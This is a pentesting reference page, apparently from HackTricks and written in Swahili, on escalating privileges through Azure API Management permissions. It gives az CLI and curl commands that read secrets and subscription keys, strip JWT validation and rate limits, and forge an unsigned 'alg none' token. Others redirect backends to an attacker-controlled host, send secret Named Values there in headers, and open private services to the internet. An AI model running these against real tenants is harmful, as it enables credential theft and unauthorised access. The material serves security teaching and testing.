Az - API Management Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Microsoft.ApiManagement/service/namedValues/read & Microsoft.ApiManagement/service/namedValues/listValue/action

Shambulio linahusisha kupata siri nyeti zilizohifadhiwa katika Azure API Management Named Values, ama kwa kuzipata moja kwa moja au kwa kutumia vibaya ruhusa ili kupata siri zinazohifadhiwa katika Key Vault kupitia managed identities.

az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>

Microsoft.ApiManagement/service/subscriptions/read & Microsoft.ApiManagement/service/subscriptions/listSecrets/action

Kwa kila subscription, mshambuliaji anaweza kupata subscription keys kwa kutumia endpoint ya listSecrets kwa njia ya POST:

az rest --method POST \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"

Jibu linajumuisha subscription primary key (primaryKey) na secondary key (secondaryKey). Kwa kutumia funguo hizi, attacker anaweza kuthibitisha na kufikia APIs zilizochapishwa kupitia API Management Gateway:

curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
https://<service-name>.azure-api.net/<api-path>

Mshambuliaji anaweza kufikia APIs zote na products zinazohusiana na subscription. Ikiwa subscription ina ufikiaji wa products au APIs nyeti, mshambuliaji anaweza kupata taarifa za siri au kufanya operesheni zisizoidhinishwa.

Microsoft.ApiManagement/service/policies/write or Microsoft.ApiManagement/service/apis/policies/write

Mshambuliaji kwanza anapata API policy ya sasa:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"

Mvamizi anaweza kubadilisha sera kwa njia mbalimbali kulingana na malengo yao. Kwa mfano, ili kuzima uthibitishaji, ikiwa sera inajumuisha JWT token validation, mvamizi anaweza kuondoa au kuiweka sehemu hiyo kama maoni:

<policies>
<inbound>
<base />
<!-- JWT validation removed by the attacker -->
<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
...
</validate-jwt> -->
</inbound>
<backend>
<base />
</backend>
<outbound>
<base />
</outbound>
<on-error>
<base />
</on-error>
</policies>

Ili kuondoa rate limiting controls na kuruhusu denial-of-service attacks, mshambuliaji anaweza kuondoa au kuweka katika maoni quota na rate-limit policies:

<policies>
<inbound>
<base />
<!-- Rate limiting removed by the attacker -->
<!-- <rate-limit calls="100" renewal-period="60" />
<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
</inbound>
...
</policies>

Ili kubadilisha njia ya backend na kuelekeza trafiki kwa seva inayodhibitiwa na mshambuliaji:

<policies>
...
<inbound>
<base />
<set-backend-service base-url="https://attacker-controlled-server.com" />
</inbound>
...
</policies>

Mshambulizi kisha anatumia sera iliyorekebishwa. Mwili wa ombi lazima uwe JSON object unaojumuisha sera katika muundo wa XML:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
}
}'

Uwekaji vibaya wa Uthibitishaji wa JWT

Mshambulizi anahitaji kujua kwamba API inatumia uthibitishaji wa JWT token na kwamba sera imewekwa vibaya. Sera za uthibitishaji za JWT zilizo konfigurishwa vibaya zinaweza kuwa na require-signed-tokens="false" au require-expiration-time="false", ambayo inaruhusu huduma kukubali unsigned tokens au tokens ambazo hazina tarehe ya kumalizika.

Mshambulizi huunda JWT token yenye madhara kwa kutumia algorithm none (unsigned):

# Header: {"alg":"none"}
# Payload: {"sub":"user"}
eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.

Mshambulizi anatuma ombi kwa API akitumia token yenye madhara:

curl -X GET \
-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
https://<apim>.azure-api.net/path

Ikiwa sera imewekwa vibaya na require-signed-tokens="false", huduma itakubali token isiyosainiwa. Mshambuliaji pia anaweza kuunda token bila klaimu ya kumalizika ikiwa require-expiration-time="false".

Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action

Mshambuliaji kwanza anakagua usanidi wa mtandao wa huduma:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"

Mshambuliaji anapitia jibu la JSON ili kuthibitisha thamani za publicNetworkAccess na virtualNetworkType. Iwapo publicNetworkAccess imewekwa kuwa false au virtualNetworkType imewekwa kuwa Internal, huduma imewekwa kwa ufikiaji wa kibinafsi.

Ili kufungua huduma kwa Intaneti, mshambuliaji lazima abadilishe mipangilio yote miwili. Ikiwa huduma inaendeshwa katika hali ya ndani (virtualNetworkType: "Internal"), mshambuliaji anabadilisha kuwa None au External na kuwezesha publicNetworkAccess. Hii inaweza kufanywa kwa kutumia Azure Management API:

az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Enabled",
"virtualNetworkType": "None"
}
}'

Baada tu virtualNetworkType inapowekwa kuwa None au External na publicNetworkAccess ikiwashwa, huduma na APIs zake zote zinapatikana kutoka mtandao, hata kama awali zilikuwa zinalindwa nyuma ya mtandao wa kibinafsi au endpoints za kibinafsi.

Microsoft.ApiManagement/service/backends/write

Mshambuliaji kwanza huorodhesha backends zilizopo ili kubaini ipi ya kubadilisha:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"

Mshambuliaji anapata usanidi wa sasa wa backend wanayotaka kuubadilisha:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"

Mshambuliaji hubadilisha backend URL ili kuielekeza kwenye server chini ya udhibiti wao. Kwanza, wanapata ETag kutoka kwa response iliyopita, kisha wanasasisha backend:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"description": "Backend modified by attacker"
}
}'

Kwa njia mbadala, mshambuliaji anaweza kusanidi backend headers ili exfiltrate Named Values zenye siri. Hii inafanywa kupitia backend credentials configuration:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"credentials": {
"header": {
"X-Secret-Value": ["{{named-value-secret}}"]
}
}
}
}'

Kwa usanidi huu, Named Values zinatumwa kama headers katika maombi yote kwa attacker-controlled backend, na hivyo kuwezesha exfiltration ya siri nyeti.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks